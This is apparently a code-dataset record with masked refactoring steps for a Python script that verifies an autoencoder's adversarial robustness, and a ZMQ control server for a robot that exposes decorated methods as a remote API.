{ "blob_id": "44e1208a2165fe68f71d0aa49baa29b26c961e02", "index": 5681, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef main():\n \"\"\"\n\tTrains an autoencoder on (generated) data and checks adversarial robustness\n\t\"\"\"\n architecture = [10, 5, 10]\n print('----------Training autoencoder----------')\n aut = autoencoder(architecture=architecture)\n data = pd.read_csv('datasets/sine_curve.csv', header=None)\n aut.train(data, epochs=20, learning_rate=0.01)\n if not aut.saveflag:\n aut.saveAE()\n print('Saving the autoencoder after training')\n print('------Checking properties of autoencoders-------')\n boundingBox = 1\n prop1 = ['adversarial-example', 0.1]\n prop2 = ['adversarial-robustness', [1] * 10, 0.1, 0.1]\n prop3 = ['fairness', 1, 0.1]\n enc = smtEncoding()\n counterExample = enc.checkProperties(autoencoder=aut, prop=prop2,\n boundingBox=1)\n mara = marabouEncoding()\n mara.checkProperties(autoencoder=aut, prop=prop2, boundingBox=1, folder\n ='Demo-aut/autoencoder.onnx')\n if counterExample == None:\n print('Autoencoder satisfies property is the given region')\n else:\n print('Autoencoder does not satisfy property in the given region for',\n counterExample)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef main():\n \"\"\"\n\tTrains an autoencoder on (generated) data and checks adversarial robustness\n\t\"\"\"\n architecture = [10, 5, 10]\n print('----------Training autoencoder----------')\n aut = autoencoder(architecture=architecture)\n data = pd.read_csv('datasets/sine_curve.csv', header=None)\n aut.train(data, epochs=20, learning_rate=0.01)\n if not aut.saveflag:\n aut.saveAE()\n print('Saving the autoencoder after training')\n print('------Checking properties of autoencoders-------')\n boundingBox = 1\n prop1 = ['adversarial-example', 0.1]\n prop2 = ['adversarial-robustness', [1] * 10, 0.1, 0.1]\n prop3 = ['fairness', 1, 0.1]\n enc = smtEncoding()\n counterExample = enc.checkProperties(autoencoder=aut, prop=prop2,\n boundingBox=1)\n mara = marabouEncoding()\n mara.checkProperties(autoencoder=aut, prop=prop2, boundingBox=1, folder\n ='Demo-aut/autoencoder.onnx')\n if counterExample == None:\n print('Autoencoder satisfies property is the given region')\n else:\n print('Autoencoder does not satisfy property in the given region for',\n counterExample)\n\n\nmain()\n", "step-4": "import pandas as pd\nimport copy as cp\nimport numpy as np\nfrom autoencoder import *\nfrom encoding import smtEncoding\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom data_generator import *\nfrom marabou_encoding import marabouEncoding\n\n\ndef main():\n \"\"\"\n\tTrains an autoencoder on (generated) data and checks adversarial robustness\n\t\"\"\"\n architecture = [10, 5, 10]\n print('----------Training autoencoder----------')\n aut = autoencoder(architecture=architecture)\n data = pd.read_csv('datasets/sine_curve.csv', header=None)\n aut.train(data, epochs=20, learning_rate=0.01)\n if not aut.saveflag:\n aut.saveAE()\n print('Saving the autoencoder after training')\n print('------Checking properties of autoencoders-------')\n boundingBox = 1\n prop1 = ['adversarial-example', 0.1]\n prop2 = ['adversarial-robustness', [1] * 10, 0.1, 0.1]\n prop3 = ['fairness', 1, 0.1]\n enc = smtEncoding()\n counterExample = enc.checkProperties(autoencoder=aut, prop=prop2,\n boundingBox=1)\n mara = marabouEncoding()\n mara.checkProperties(autoencoder=aut, prop=prop2, boundingBox=1, folder\n ='Demo-aut/autoencoder.onnx')\n if counterExample == None:\n print('Autoencoder satisfies property is the given region')\n else:\n print('Autoencoder does not satisfy property in the given region for',\n counterExample)\n\n\nmain()\n", "step-5": "import pandas as pd\nimport copy as cp\nimport numpy as np\nfrom autoencoder import *\nfrom encoding import smtEncoding\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom data_generator import *\nfrom marabou_encoding import marabouEncoding\n\ndef main():\n\t\n\t'''\n\tTrains an autoencoder on (generated) data and checks adversarial robustness\n\t'''\n\t\n\tarchitecture = [10,5,10] # Change the architecture of the autoencoder according to requirement\n\t\n\n\n\tprint('----------Training autoencoder----------')\n\taut = autoencoder(architecture=architecture)\n\tdata = pd.read_csv('datasets/sine_curve.csv', header=None)\n\t\n\taut.train(data, epochs=20, learning_rate=0.01)\n\t\n\tif not aut.saveflag:\n\t\taut.saveAE()\n\t\tprint(\"Saving the autoencoder after training\")\n\t\n\n\t#plot_output([data, aut.predict(data)], ['Original', 'Reconstructed'])\t\n\t\n\n\tprint(\"------Checking properties of autoencoders-------\")\n\n\n\t# Parameters that can be modified\n\tboundingBox = 1 # Region around origin where the properties need to checked\n\tprop1 = ['adversarial-example', 0.1]\n\tprop2 = ['adversarial-robustness', [1]*10, 0.1, 0.1]\n\tprop3 = ['fairness', 1, 0.1]\n\n\tenc = smtEncoding()\n\tcounterExample = enc.checkProperties(autoencoder=aut, prop=prop2, boundingBox=1)\n\n\t# For marabou\n\tmara = marabouEncoding()\n\tmara.checkProperties(autoencoder=aut, prop=prop2, boundingBox=1, folder = \"Demo-aut/autoencoder.onnx\")\n\t\n\n\tif counterExample == None:\n\t\tprint(\"Autoencoder satisfies property is the given region\")\n\telse:\n\t\tprint(\"Autoencoder does not satisfy property in the given region for\", counterExample)\n\nmain()\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#!/usr/bin/env python """Server that accepts and executes control-type commands on the bot.""" import sys import os from inspect import getmembers, ismethod from simplejson.decoder import JSONDecodeError import zmq import signal # This is required to make imports work sys.path = [os.getcwd()] + sys.path import bot.lib.lib as lib import pub_server as pub_server_mod import bot.lib.messages as msgs from bot.driver.mec_driver import MecDriver def is_api_method(obj, name): """Tests whether named method exists in obj and is flagged for API export. :param obj: API-exported object to search for the given method on. :type ojb: string :param name: Name of method to check for. :type name: string :returns: True if given method is on given obj and is exported, else False. """ try: method = getattr(obj, name) except AttributeError: return False return (ismethod(method) and hasattr(method, "__api_call")) class CtrlServer(object): """Exports bot control via ZMQ. Most functionally exported by CtrlServer is in the form of methods exposed by the API. @lib.api_call decorators can be added to bot systems, which tags them for export. They can then be called remotely via CtrlClient, which is typically owned by an interface like the CLI, which typically accepts commands from an agent like a human. Some control is exported directly by CtrlServer, not through the API. For example, CtrlServer responds directly to ping messages, list messages (which give the objects/methods exposed by the API), and exit messages. CtrlServer is the primary owner of bot resources, which we call systems. For example, it's CtrlServer that instantiates gunner and follower. Through those two, CtrlServer owns the gun, the IR hub, the turret and basically every other bot system. The messages that CtrlServer accepts and responds with are fully specified in lib.messages. Make any changes to messages there. CtrlServer can be instructed (via the API) to spawn a new thread for a PubServer. When that happens, CtrlServer passes its systems to PubServer, which can read their state and publish it over a ZMQ PUB socket. """ def __init__(self, testing=None, config_file="bot/config.yaml"): """Build ZMQ REP socket and instantiate bot systems. :param testing: True if running on simulated HW, False if on bot. :type testing: boolean :param config_file: Name of file to read configuration from. :type config_file: string """ # Register signal handler, shut down cleanly (think motors) signal.signal(signal.SIGINT, self.signal_handler) # Load configuration and logger self.config = lib.get_config(config_file) self.logger = lib.get_logger() # Testing flag will cause objects to run on simulated hardware if testing is True or testing == "True": self.logger.info("CtrlServer running in test mode") lib.set_testing(True) elif testing is None: self.logger.info( "Defaulting to config testing flag: {}".format( self.config["testing"])) lib.set_testing(self.config["testing"]) else: self.logger.info("CtrlServer running in non-test mode") lib.set_testing(False) # Build socket to listen for requests self.context = zmq.Context() self.ctrl_sock = self.context.socket(zmq.REP) self.server_bind_addr = "{protocol}://{host}:{port}".format( protocol=self.config["server_protocol"], host=self.config["server_bind_host"], port=self.config["ctrl_server_port"]) try: self.ctrl_sock.bind(self.server_bind_addr) except zmq.ZMQError: self.logger.error("ZMQ error. Is a server already running?") self.logger.warning("May be connected to an old server instance.") sys.exit(1) self.systems = self.assign_subsystems() self.logger.info("Control server initialized") # Don't spawn pub_server until told to self.pub_server = None def signal_handler(self, signal, frame): self.logger.info("Caught SIGINT (Ctrl+C), closing cleanly") self.clean_up() self.logger.info("Cleaned up bot, exiting...") sys.exit(0) def assign_subsystems(self): """Instantiates and stores references to bot subsystems. :returns: Dict of subsystems, maps system name to instantiated object. """ self.driver = MecDriver() systems = {} systems["ctrl"] = self systems["driver"] = self.driver self.logger.debug("Systems: {}".format(systems)) return systems def listen(self): """Perpetually listen for messages, pass them to generic handler.""" self.logger.info("Control server: {}".format(self.server_bind_addr)) while True: try: msg = self.ctrl_sock.recv_json() reply = self.handle_msg(msg) self.logger.debug("Sending: {}".format(reply)) self.ctrl_sock.send_json(reply) except JSONDecodeError: err_msg = "Not a JSON message!" self.logger.warning(err_msg) self.ctrl_sock.send_json(msgs.error(err_msg)) except KeyboardInterrupt: self.logger.info("Exiting control server. Bye!") self.clean_up() sys.exit(0) def handle_msg(self, msg): """Generic message handler. Hands-off based on type of message. :param msg: Message, received via ZMQ from client, to handle. :type msg: dict :returns: An appropriate message reply dict, from lib.messages. """ self.logger.debug("Received: {}".format(msg)) try: msg_type = msg["type"] except KeyError as e: return msgs.error(e) if msg_type == "ping_req": reply = msgs.ping_reply() elif msg_type == "list_req": reply = self.list_callables() elif msg_type == "call_req": try: obj_name = msg["obj_name"] method = msg["method"] params = msg["params"] reply = self.call_method(obj_name, method, params) except KeyError as e: return msgs.error(e) elif msg_type == "exit_req": self.logger.info("Received message to die. Bye!") reply = msgs.exit_reply() # Need to actually send reply here as we're about to exit self.logger.debug("Sending: {}".format(reply)) self.ctrl_sock.send_json(reply) self.clean_up() sys.exit(0) else: err_msg = "Unrecognized message: {}".format(msg) self.logger.warning(err_msg) reply = msgs.error(err_msg) return reply def list_callables(self): """Build list of callable methods on each exported subsystem object. Uses introspection to create a list of callable methods for each registered subsystem object. Only methods which are flagged using the @lib.api_call decorator will be included. :returns: list_reply message with callable objects and their methods. """ self.logger.debug("List of callable API objects requested") # Dict of subsystem object names to their callable methods. callables = {} for name, obj in self.systems.items(): methods = [] # Filter out methods which are not explicitly flagged for export for member in getmembers(obj): if is_api_method(obj, member[0]): methods.append(member[0]) callables[name] = methods return msgs.list_reply(callables) def call_method(self, name, method, params): """Call a previously registered subsystem method by name. Only methods tagged with the @api_call decorator can be called. :param name: Assigned name of the registered subsystem. :type name: string :param method: Subsystem method to be called. :type method: string :param params: Additional parameters for the called method. :type params: dict :returns: call_reply or error message dict to be sent to caller. """ self.logger.debug("API call: {}.{}({})".format(name, method, params)) if name in self.systems: obj = self.systems[name] if is_api_method(obj, method): try: # Calls given obj.method, unpacking and passing params dict call_return = getattr(obj, method)(**params) msg = "Called {}.{}".format(name, method) self.logger.debug(msg + ",returned:{}".format(call_return)) return msgs.call_reply(msg, call_return) except TypeError: # Raised when we have a mismatch of the method's kwargs # TODO: Return argspec here? err_msg = "Invalid params for {}.{}".format(name, method) self.logger.warning(err_msg) return msgs.error(err_msg) except Exception as e: # Catch exception raised by called method, notify client err_msg = "Exception: '{}'".format(str(e)) self.logger.warning(err_msg) return msgs.error(err_msg) else: err_msg = "Invalid method: '{}.{}'".format(name, method) self.logger.warning(err_msg) return msgs.error(err_msg) else: err_msg = "Invalid object: '{}'".format(name) self.logger.warning(err_msg) return msgs.error(err_msg) @lib.api_call def echo(self, msg=None): """Echo a message back to the caller. :param msg: Message to be echoed back to caller, default is None. :returns: Message given by param, defaults to None. """ return msg @lib.api_call def exception(self): """Raise a test exception which will be returned to the caller.""" raise Exception("Exception test") @lib.api_call def spawn_pub_server(self): """Spawn publisher thread.""" if self.pub_server is None: self.pub_server = pub_server_mod.PubServer(self.systems) # Prevent pub_server thread from blocking the process from closing self.pub_server.setDaemon(True) self.pub_server.start() msg = "Spawned pub server" self.logger.info(msg) return msg else: err_msg = "PubServer is already running" self.logger.warning(err_msg) return err_msg @lib.api_call def stop_full(self): """Stop all drive and gun motors, set turret to safe state.""" self.systems["driver"].move(0, 0) def clean_up(self): """Tear down ZMQ socket.""" self.stop_full() self.ctrl_sock.close() self.context.term() if __name__ == "__main__": if len(sys.argv) == 2: server = CtrlServer(sys.argv[1]) else: server = CtrlServer() server.listen()
normal
{ "blob_id": "ddb81e3ce0df44ee503c558b68b41c35935358a0", "index": 8663, "step-1": "<mask token>\n\n\nclass CtrlServer(object):\n <mask token>\n <mask token>\n <mask token>\n\n def assign_subsystems(self):\n \"\"\"Instantiates and stores references to bot subsystems.\n\n :returns: Dict of subsystems, maps system name to instantiated object.\n\n \"\"\"\n self.driver = MecDriver()\n systems = {}\n systems['ctrl'] = self\n systems['driver'] = self.driver\n self.logger.debug('Systems: {}'.format(systems))\n return systems\n\n def listen(self):\n \"\"\"Perpetually listen for messages, pass them to generic handler.\"\"\"\n self.logger.info('Control server: {}'.format(self.server_bind_addr))\n while True:\n try:\n msg = self.ctrl_sock.recv_json()\n reply = self.handle_msg(msg)\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n except JSONDecodeError:\n err_msg = 'Not a JSON message!'\n self.logger.warning(err_msg)\n self.ctrl_sock.send_json(msgs.error(err_msg))\n except KeyboardInterrupt:\n self.logger.info('Exiting control server. Bye!')\n self.clean_up()\n sys.exit(0)\n\n def handle_msg(self, msg):\n \"\"\"Generic message handler. Hands-off based on type of message.\n\n :param msg: Message, received via ZMQ from client, to handle.\n :type msg: dict\n :returns: An appropriate message reply dict, from lib.messages.\n\n \"\"\"\n self.logger.debug('Received: {}'.format(msg))\n try:\n msg_type = msg['type']\n except KeyError as e:\n return msgs.error(e)\n if msg_type == 'ping_req':\n reply = msgs.ping_reply()\n elif msg_type == 'list_req':\n reply = self.list_callables()\n elif msg_type == 'call_req':\n try:\n obj_name = msg['obj_name']\n method = msg['method']\n params = msg['params']\n reply = self.call_method(obj_name, method, params)\n except KeyError as e:\n return msgs.error(e)\n elif msg_type == 'exit_req':\n self.logger.info('Received message to die. Bye!')\n reply = msgs.exit_reply()\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n self.clean_up()\n sys.exit(0)\n else:\n err_msg = 'Unrecognized message: {}'.format(msg)\n self.logger.warning(err_msg)\n reply = msgs.error(err_msg)\n return reply\n\n def list_callables(self):\n \"\"\"Build list of callable methods on each exported subsystem object.\n\n Uses introspection to create a list of callable methods for each\n registered subsystem object. Only methods which are flagged using the\n @lib.api_call decorator will be included.\n\n :returns: list_reply message with callable objects and their methods.\n\n \"\"\"\n self.logger.debug('List of callable API objects requested')\n callables = {}\n for name, obj in self.systems.items():\n methods = []\n for member in getmembers(obj):\n if is_api_method(obj, member[0]):\n methods.append(member[0])\n callables[name] = methods\n return msgs.list_reply(callables)\n <mask token>\n\n @lib.api_call\n def echo(self, msg=None):\n \"\"\"Echo a message back to the caller.\n\n :param msg: Message to be echoed back to caller, default is None.\n :returns: Message given by param, defaults to None.\n\n \"\"\"\n return msg\n\n @lib.api_call\n def exception(self):\n \"\"\"Raise a test exception which will be returned to the caller.\"\"\"\n raise Exception('Exception test')\n\n @lib.api_call\n def spawn_pub_server(self):\n \"\"\"Spawn publisher thread.\"\"\"\n if self.pub_server is None:\n self.pub_server = pub_server_mod.PubServer(self.systems)\n self.pub_server.setDaemon(True)\n self.pub_server.start()\n msg = 'Spawned pub server'\n self.logger.info(msg)\n return msg\n else:\n err_msg = 'PubServer is already running'\n self.logger.warning(err_msg)\n return err_msg\n\n @lib.api_call\n def stop_full(self):\n \"\"\"Stop all drive and gun motors, set turret to safe state.\"\"\"\n self.systems['driver'].move(0, 0)\n\n def clean_up(self):\n \"\"\"Tear down ZMQ socket.\"\"\"\n self.stop_full()\n self.ctrl_sock.close()\n self.context.term()\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass CtrlServer(object):\n <mask token>\n\n def __init__(self, testing=None, config_file='bot/config.yaml'):\n \"\"\"Build ZMQ REP socket and instantiate bot systems.\n\n :param testing: True if running on simulated HW, False if on bot.\n :type testing: boolean\n :param config_file: Name of file to read configuration from.\n :type config_file: string\n\n \"\"\"\n signal.signal(signal.SIGINT, self.signal_handler)\n self.config = lib.get_config(config_file)\n self.logger = lib.get_logger()\n if testing is True or testing == 'True':\n self.logger.info('CtrlServer running in test mode')\n lib.set_testing(True)\n elif testing is None:\n self.logger.info('Defaulting to config testing flag: {}'.format\n (self.config['testing']))\n lib.set_testing(self.config['testing'])\n else:\n self.logger.info('CtrlServer running in non-test mode')\n lib.set_testing(False)\n self.context = zmq.Context()\n self.ctrl_sock = self.context.socket(zmq.REP)\n self.server_bind_addr = '{protocol}://{host}:{port}'.format(protocol\n =self.config['server_protocol'], host=self.config[\n 'server_bind_host'], port=self.config['ctrl_server_port'])\n try:\n self.ctrl_sock.bind(self.server_bind_addr)\n except zmq.ZMQError:\n self.logger.error('ZMQ error. Is a server already running?')\n self.logger.warning('May be connected to an old server instance.')\n sys.exit(1)\n self.systems = self.assign_subsystems()\n self.logger.info('Control server initialized')\n self.pub_server = None\n\n def signal_handler(self, signal, frame):\n self.logger.info('Caught SIGINT (Ctrl+C), closing cleanly')\n self.clean_up()\n self.logger.info('Cleaned up bot, exiting...')\n sys.exit(0)\n\n def assign_subsystems(self):\n \"\"\"Instantiates and stores references to bot subsystems.\n\n :returns: Dict of subsystems, maps system name to instantiated object.\n\n \"\"\"\n self.driver = MecDriver()\n systems = {}\n systems['ctrl'] = self\n systems['driver'] = self.driver\n self.logger.debug('Systems: {}'.format(systems))\n return systems\n\n def listen(self):\n \"\"\"Perpetually listen for messages, pass them to generic handler.\"\"\"\n self.logger.info('Control server: {}'.format(self.server_bind_addr))\n while True:\n try:\n msg = self.ctrl_sock.recv_json()\n reply = self.handle_msg(msg)\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n except JSONDecodeError:\n err_msg = 'Not a JSON message!'\n self.logger.warning(err_msg)\n self.ctrl_sock.send_json(msgs.error(err_msg))\n except KeyboardInterrupt:\n self.logger.info('Exiting control server. Bye!')\n self.clean_up()\n sys.exit(0)\n\n def handle_msg(self, msg):\n \"\"\"Generic message handler. Hands-off based on type of message.\n\n :param msg: Message, received via ZMQ from client, to handle.\n :type msg: dict\n :returns: An appropriate message reply dict, from lib.messages.\n\n \"\"\"\n self.logger.debug('Received: {}'.format(msg))\n try:\n msg_type = msg['type']\n except KeyError as e:\n return msgs.error(e)\n if msg_type == 'ping_req':\n reply = msgs.ping_reply()\n elif msg_type == 'list_req':\n reply = self.list_callables()\n elif msg_type == 'call_req':\n try:\n obj_name = msg['obj_name']\n method = msg['method']\n params = msg['params']\n reply = self.call_method(obj_name, method, params)\n except KeyError as e:\n return msgs.error(e)\n elif msg_type == 'exit_req':\n self.logger.info('Received message to die. Bye!')\n reply = msgs.exit_reply()\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n self.clean_up()\n sys.exit(0)\n else:\n err_msg = 'Unrecognized message: {}'.format(msg)\n self.logger.warning(err_msg)\n reply = msgs.error(err_msg)\n return reply\n\n def list_callables(self):\n \"\"\"Build list of callable methods on each exported subsystem object.\n\n Uses introspection to create a list of callable methods for each\n registered subsystem object. Only methods which are flagged using the\n @lib.api_call decorator will be included.\n\n :returns: list_reply message with callable objects and their methods.\n\n \"\"\"\n self.logger.debug('List of callable API objects requested')\n callables = {}\n for name, obj in self.systems.items():\n methods = []\n for member in getmembers(obj):\n if is_api_method(obj, member[0]):\n methods.append(member[0])\n callables[name] = methods\n return msgs.list_reply(callables)\n\n def call_method(self, name, method, params):\n \"\"\"Call a previously registered subsystem method by name. Only\n methods tagged with the @api_call decorator can be called.\n\n :param name: Assigned name of the registered subsystem.\n :type name: string\n :param method: Subsystem method to be called.\n :type method: string\n :param params: Additional parameters for the called method.\n :type params: dict\n :returns: call_reply or error message dict to be sent to caller.\n\n \"\"\"\n self.logger.debug('API call: {}.{}({})'.format(name, method, params))\n if name in self.systems:\n obj = self.systems[name]\n if is_api_method(obj, method):\n try:\n call_return = getattr(obj, method)(**params)\n msg = 'Called {}.{}'.format(name, method)\n self.logger.debug(msg + ',returned:{}'.format(call_return))\n return msgs.call_reply(msg, call_return)\n except TypeError:\n err_msg = 'Invalid params for {}.{}'.format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n except Exception as e:\n err_msg = \"Exception: '{}'\".format(str(e))\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid method: '{}.{}'\".format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid object: '{}'\".format(name)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n\n @lib.api_call\n def echo(self, msg=None):\n \"\"\"Echo a message back to the caller.\n\n :param msg: Message to be echoed back to caller, default is None.\n :returns: Message given by param, defaults to None.\n\n \"\"\"\n return msg\n\n @lib.api_call\n def exception(self):\n \"\"\"Raise a test exception which will be returned to the caller.\"\"\"\n raise Exception('Exception test')\n\n @lib.api_call\n def spawn_pub_server(self):\n \"\"\"Spawn publisher thread.\"\"\"\n if self.pub_server is None:\n self.pub_server = pub_server_mod.PubServer(self.systems)\n self.pub_server.setDaemon(True)\n self.pub_server.start()\n msg = 'Spawned pub server'\n self.logger.info(msg)\n return msg\n else:\n err_msg = 'PubServer is already running'\n self.logger.warning(err_msg)\n return err_msg\n\n @lib.api_call\n def stop_full(self):\n \"\"\"Stop all drive and gun motors, set turret to safe state.\"\"\"\n self.systems['driver'].move(0, 0)\n\n def clean_up(self):\n \"\"\"Tear down ZMQ socket.\"\"\"\n self.stop_full()\n self.ctrl_sock.close()\n self.context.term()\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef is_api_method(obj, name):\n \"\"\"Tests whether named method exists in obj and is flagged for API export.\n\n :param obj: API-exported object to search for the given method on.\n :type ojb: string\n :param name: Name of method to check for.\n :type name: string\n :returns: True if given method is on given obj and is exported, else False.\n\n \"\"\"\n try:\n method = getattr(obj, name)\n except AttributeError:\n return False\n return ismethod(method) and hasattr(method, '__api_call')\n\n\nclass CtrlServer(object):\n \"\"\"Exports bot control via ZMQ.\n\n Most functionally exported by CtrlServer is in the form of methods\n exposed by the API. @lib.api_call decorators can be added to bot\n systems, which tags them for export. They can then be called\n remotely via CtrlClient, which is typically owned by an interface\n like the CLI, which typically accepts commands from an agent like\n a human.\n\n Some control is exported directly by CtrlServer, not through the\n API. For example, CtrlServer responds directly to ping messages,\n list messages (which give the objects/methods exposed by the API),\n and exit messages.\n\n CtrlServer is the primary owner of bot resources, which we call\n systems. For example, it's CtrlServer that instantiates gunner\n and follower. Through those two, CtrlServer owns the gun, the\n IR hub, the turret and basically every other bot system.\n\n The messages that CtrlServer accepts and responds with are fully\n specified in lib.messages. Make any changes to messages there.\n\n CtrlServer can be instructed (via the API) to spawn a new thread\n for a PubServer. When that happens, CtrlServer passes its systems\n to PubServer, which can read their state and publish it over a\n ZMQ PUB socket.\n\n \"\"\"\n\n def __init__(self, testing=None, config_file='bot/config.yaml'):\n \"\"\"Build ZMQ REP socket and instantiate bot systems.\n\n :param testing: True if running on simulated HW, False if on bot.\n :type testing: boolean\n :param config_file: Name of file to read configuration from.\n :type config_file: string\n\n \"\"\"\n signal.signal(signal.SIGINT, self.signal_handler)\n self.config = lib.get_config(config_file)\n self.logger = lib.get_logger()\n if testing is True or testing == 'True':\n self.logger.info('CtrlServer running in test mode')\n lib.set_testing(True)\n elif testing is None:\n self.logger.info('Defaulting to config testing flag: {}'.format\n (self.config['testing']))\n lib.set_testing(self.config['testing'])\n else:\n self.logger.info('CtrlServer running in non-test mode')\n lib.set_testing(False)\n self.context = zmq.Context()\n self.ctrl_sock = self.context.socket(zmq.REP)\n self.server_bind_addr = '{protocol}://{host}:{port}'.format(protocol\n =self.config['server_protocol'], host=self.config[\n 'server_bind_host'], port=self.config['ctrl_server_port'])\n try:\n self.ctrl_sock.bind(self.server_bind_addr)\n except zmq.ZMQError:\n self.logger.error('ZMQ error. Is a server already running?')\n self.logger.warning('May be connected to an old server instance.')\n sys.exit(1)\n self.systems = self.assign_subsystems()\n self.logger.info('Control server initialized')\n self.pub_server = None\n\n def signal_handler(self, signal, frame):\n self.logger.info('Caught SIGINT (Ctrl+C), closing cleanly')\n self.clean_up()\n self.logger.info('Cleaned up bot, exiting...')\n sys.exit(0)\n\n def assign_subsystems(self):\n \"\"\"Instantiates and stores references to bot subsystems.\n\n :returns: Dict of subsystems, maps system name to instantiated object.\n\n \"\"\"\n self.driver = MecDriver()\n systems = {}\n systems['ctrl'] = self\n systems['driver'] = self.driver\n self.logger.debug('Systems: {}'.format(systems))\n return systems\n\n def listen(self):\n \"\"\"Perpetually listen for messages, pass them to generic handler.\"\"\"\n self.logger.info('Control server: {}'.format(self.server_bind_addr))\n while True:\n try:\n msg = self.ctrl_sock.recv_json()\n reply = self.handle_msg(msg)\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n except JSONDecodeError:\n err_msg = 'Not a JSON message!'\n self.logger.warning(err_msg)\n self.ctrl_sock.send_json(msgs.error(err_msg))\n except KeyboardInterrupt:\n self.logger.info('Exiting control server. Bye!')\n self.clean_up()\n sys.exit(0)\n\n def handle_msg(self, msg):\n \"\"\"Generic message handler. Hands-off based on type of message.\n\n :param msg: Message, received via ZMQ from client, to handle.\n :type msg: dict\n :returns: An appropriate message reply dict, from lib.messages.\n\n \"\"\"\n self.logger.debug('Received: {}'.format(msg))\n try:\n msg_type = msg['type']\n except KeyError as e:\n return msgs.error(e)\n if msg_type == 'ping_req':\n reply = msgs.ping_reply()\n elif msg_type == 'list_req':\n reply = self.list_callables()\n elif msg_type == 'call_req':\n try:\n obj_name = msg['obj_name']\n method = msg['method']\n params = msg['params']\n reply = self.call_method(obj_name, method, params)\n except KeyError as e:\n return msgs.error(e)\n elif msg_type == 'exit_req':\n self.logger.info('Received message to die. Bye!')\n reply = msgs.exit_reply()\n self.logger.debug('Sending: {}'.format(reply))\n self.ctrl_sock.send_json(reply)\n self.clean_up()\n sys.exit(0)\n else:\n err_msg = 'Unrecognized message: {}'.format(msg)\n self.logger.warning(err_msg)\n reply = msgs.error(err_msg)\n return reply\n\n def list_callables(self):\n \"\"\"Build list of callable methods on each exported subsystem object.\n\n Uses introspection to create a list of callable methods for each\n registered subsystem object. Only methods which are flagged using the\n @lib.api_call decorator will be included.\n\n :returns: list_reply message with callable objects and their methods.\n\n \"\"\"\n self.logger.debug('List of callable API objects requested')\n callables = {}\n for name, obj in self.systems.items():\n methods = []\n for member in getmembers(obj):\n if is_api_method(obj, member[0]):\n methods.append(member[0])\n callables[name] = methods\n return msgs.list_reply(callables)\n\n def call_method(self, name, method, params):\n \"\"\"Call a previously registered subsystem method by name. Only\n methods tagged with the @api_call decorator can be called.\n\n :param name: Assigned name of the registered subsystem.\n :type name: string\n :param method: Subsystem method to be called.\n :type method: string\n :param params: Additional parameters for the called method.\n :type params: dict\n :returns: call_reply or error message dict to be sent to caller.\n\n \"\"\"\n self.logger.debug('API call: {}.{}({})'.format(name, method, params))\n if name in self.systems:\n obj = self.systems[name]\n if is_api_method(obj, method):\n try:\n call_return = getattr(obj, method)(**params)\n msg = 'Called {}.{}'.format(name, method)\n self.logger.debug(msg + ',returned:{}'.format(call_return))\n return msgs.call_reply(msg, call_return)\n except TypeError:\n err_msg = 'Invalid params for {}.{}'.format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n except Exception as e:\n err_msg = \"Exception: '{}'\".format(str(e))\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid method: '{}.{}'\".format(name, method)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n else:\n err_msg = \"Invalid object: '{}'\".format(name)\n self.logger.warning(err_msg)\n return msgs.error(err_msg)\n\n @lib.api_call\n def echo(self, msg=None):\n \"\"\"Echo a message back to the caller.\n\n :param msg: Message to be echoed back to caller, default is None.\n :returns: Message given by param, defaults to None.\n\n \"\"\"\n return msg\n\n @lib.api_call\n def exception(self):\n \"\"\"Raise a test exception which will be returned to the caller.\"\"\"\n raise Exception('Exception test')\n\n @lib.api_call\n def spawn_pub_server(self):\n \"\"\"Spawn publisher thread.\"\"\"\n if self.pub_server is None:\n self.pub_server = pub_server_mod.PubServer(self.systems)\n self.pub_server.setDaemon(True)\n self.pub_server.start()\n msg = 'Spawned pub server'\n self.logger.info(msg)\n return msg\n else:\n err_msg = 'PubServer is already running'\n self.logger.warning(err_msg)\n return err_msg\n\n @lib.api_call\n def stop_full(self):\n \"\"\"Stop all drive and gun motors, set turret to safe state.\"\"\"\n self.systems['driver'].move(0, 0)\n\n def clean_up(self):\n \"\"\"Tear down ZMQ socket.\"\"\"\n self.stop_full()\n self.ctrl_sock.close()\n self.context.term()\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 2:\n server = CtrlServer(sys.argv[1])\n else:\n server = CtrlServer()\n server.listen()\n", "step-4": "<mask token>\nimport sys\nimport os\nfrom inspect import getmembers, ismethod\nfrom simplejson.decoder import JSONDecodeError\nimport zmq\nimport signal\nsys.path = [os.getcwd()] + sys.path\nimport bot.lib.lib as lib\nimport pub_server as pub_server_mod\nimport bot.lib.messages as msgs\nfrom bot.driver.mec_driver import MecDriver\n\n\ndef is_api_method(obj, name):\n \"\"\"Tests whether named method exists in obj and is flagged for API export.\n\n :param obj: API-exported object to search for the given method on.\n :type ojb: string\n :param name: Name of method to check for.\n :type name: string\n :returns: True if given method is on given obj and is exported, else False.\n\n \"\"\"\n try:\n method = getattr(obj, name)\n except AttributeError:\n return False\n return ismethod(method) and hasattr(method, '__api_call')\n\n\nclass CtrlServer(object):\n \"\"\"Exports bot control via ZMQ.\n\n Most functionally exported by CtrlServer is in the form of methods\n exposed by the API. @lib.api_call decorators can be added to bot\n systems, which tags them for export. They can then be called\n remotely via CtrlClient, which is typically owned by an interface\n like the CLI, which typically accepts commands from an agent like\n a human.\n\n Some control is exported directly by CtrlServer, not through the\n API. For example, CtrlServer responds directly to ping messages,\n list 